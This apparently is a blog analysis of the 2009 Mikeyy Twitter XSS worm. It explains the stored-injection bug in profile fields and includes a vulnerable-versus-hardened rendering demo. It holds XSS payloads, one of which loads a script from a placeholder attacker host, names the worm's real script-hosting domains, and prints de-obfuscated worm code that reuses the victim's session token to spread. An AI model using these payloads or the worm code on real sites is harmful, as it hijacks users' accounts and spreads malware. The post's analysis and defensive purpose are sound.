Learnt about the worm this morning; it didn't take too long to find an infected profile just by searching.
The cause is a silly bug in handling form input posted to the server: the submitted values are stored and rendered back into the profile page without being validated or escaped, which allows script injection.
After a quick look at the page source, I found the injected code in the obvious place, the URL field of the profile:

But the vulnerability is not only in the URL field; it is also in the profile design settings.
Look at the Twitter colour design section:

Seems harmless, right? However, the colours the user selects are submitted as form fields like any other, and if that input is not validated on the way in and escaped on the way out, script can be injected through it:

The actual injected code has already been identified, but this may be a variation of it.
In other words, the vulnerability is not confined to the fields where users type free text; any value posted to the server and rendered back into a page is a candidate, so other fields may be vulnerable too.
We all make coding mistakes, but where I think Twitter FAILED was in not fixing it properly when StalkDaily came up.
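To make the bug class concrete, here is an added example (my own illustration, not the original post's code and not Twitter's code). It renders a profile from the same field names the worm writes (user[url], user[profile_link_color], user[name]) in two ways: concatenating the stored values straight into the markup, as the post describes, and a hardened version that validates each field's shape on input and escapes on output. The HTML template, the validation rules, the attacker host and the payload strings are all constructed for this demonstration.

```javascript
// Added example, not the original post's or Twitter's code. It demonstrates
// the bug class described above: profile fields (user[url],
// user[profile_link_color], user[name], as in the worm's POSTs) stored as
// posted and rendered back into the page without validation or escaping.
// The HTML template, the field handling and the payloads are constructed
// for this demo; they are not Twitter's markup.

// Minimal HTML escaper for text and double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering: the stored values go straight into the markup, so a
// colour value can close the <style> block and a URL can carry any scheme.
function renderProfileUnsafe(p) {
  return `<style>a { color: #${p.profile_link_color}; }</style>` +
         `<a href="${p.url}">${p.name}</a>`;
}

// Hardened: validate the shape of each field on input (a colour is six hex
// digits, a URL must parse and be http or https) and escape on output.
function validateProfile(p) {
  if (!/^[0-9a-fA-F]{6}$/.test(p.profile_link_color)) {
    throw new Error('bad colour');
  }
  let u;
  try { u = new URL(p.url); } catch (e) { throw new Error('bad url'); }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    throw new Error('bad url scheme');
  }
  return {
    name: String(p.name).slice(0, 50),
    url: u.href,
    profile_link_color: p.profile_link_color.toLowerCase(),
  };
}

function renderProfileSafe(p) {
  const v = validateProfile(p);
  return `<style>a { color: #${v.profile_link_color}; }</style>` +
         `<a href="${escapeHtml(v.url)}">${escapeHtml(v.name)}</a>`;
}

// Wrapper that reports either the rendered HTML or the validation error.
function safeRender(p) {
  try { return { html: renderProfileSafe(p), error: null }; }
  catch (e) { return { html: null, error: e.message }; }
}

// Constructed payloads in the shape the post describes: the colour field
// breaks out of the stylesheet and pulls a remote script; the URL field
// uses a javascript: scheme. The host name is a placeholder.
const COLOUR_PAYLOAD =
  '000000;}</style><script src="http://attacker.invalid/x.js"></script><style>';
const URL_PAYLOAD = 'javascript:alert(document.cookie)';

const EVIL = { name: 'Womp!', url: URL_PAYLOAD, profile_link_color: COLOUR_PAYLOAD };
const EVIL_URL_ONLY = { name: 'Womp!', url: URL_PAYLOAD, profile_link_color: '000000' };
const GOOD = { name: 'alice <3', url: 'https://example.com/', profile_link_color: 'FF0000' };

// True when the naive renderer lets the injected script tag through.
function unsafeContainsScript(p) {
  return renderProfileUnsafe(p).includes('<script');
}

console.log('unsafe:', renderProfileUnsafe(EVIL));
console.log('safe (both fields bad):', safeRender(EVIL));
console.log('safe (url bad):', safeRender(EVIL_URL_ONLY));
console.log('safe (good profile):', safeRender(GOOD));
```

The point of validating by shape rather than blacklisting characters is that a colour field has no legitimate reason to contain anything but six hex digits, so the whole injection surface disappears; escaping on output then protects the fields that genuinely are free text, such as the display name.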
UPDATE 1
The injected code tries to load a script from content.ireel.com/jsxss.js. It is obfuscated, but so far it looks like what has already been posted; the only thing that changes is the messages shown:
_0x4c9d[38]  Twitter should really fix this... Mikeyy
_0x4c9d[39]  I am done... Mikeyy
_0x4c9d[40]  Mikeyy is done..
_0x4c9d[41]  Twitter please fix this, regards Mikeyy
UPDATE 2
It also tries to load a script from bambamyo.110mb.com/wompwomp.js.
I also found that he is more creative in this script and encodes the injected script twice...
As suspected, the code is injected into the profile URL (user[url]) and into the link colour (user[profile_link_color]):
// Names as they appear in the de-obfuscated worm:
//   XHConn      - XMLHttpRequest wrapper the script uses to POST forms
//   token       - the authenticity_token (anti-CSRF value); the script can
//                 obtain it because it runs inside the victim's logged-in page
//   _0xcd6ax18  - the status text to tweet
//   _0xcd6ax1b  - the payload written into the URL and link colour fields
// 1. Post a status update from the victim's account.
var _0xcd6ax1c = new XHConn();
_0xcd6ax1c.connect("/status/update", "POST", "authenticity_token=" +
token + "&status=" + _0xcd6ax18 + "&return_rendered_status=true&twttr=true");
// 2. Overwrite the display name and put the payload in the profile URL.
var _0xcd6ax1d = new XHConn();
_0xcd6ax1d.connect("/account/settings", "POST", "authenticity_token=" +
token + "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
// 3. Put the same payload in the profile link colour field.
var _0xcd6ax1e = new XHConn();
_0xcd6ax1e.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none" +
"&profile_theme=0&user[profile_use_background_image]=0" +
"&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b
+ "&commit=save+changes");
// Steps 2 and 3 are then repeated twice more with identical requests.
var _0xcd6ax1f = new XHConn();
_0xcd6ax1f.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
var _0xcd6ax20 = new XHConn();
_0xcd6ax20.connect("/account/profile_settings", "POST", "authenticity_token=" +
token + "&user[profile_default]=false&tab=none&profile_theme=" +
"0&user[profile_use_background_image]=0&user[profile_background_tile]" +
"=0&user[profile_link_color]=" + _0xcd6ax1b + "&commit=save+changes");
var _0xcd6ax21 = new XHConn();
_0xcd6ax21.connect("/account/settings", "POST", "authenticity_token=" + token +
"&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user[url]="
+ _0xcd6ax1b + "&tab=home&update=update");
As seen above, it also replaces the user's name with "Womp" followed by a run of spaces and an exclamation mark.
UPDATE 3: The risks
So far the script does not cause major harm, but a variant could do more damage, such as posting the account's email address (which is private) or triggering the 'forgotten password' feature.
There is no risk of the password being changed, as Twitter requires the current password to be entered, and that is not available to the script.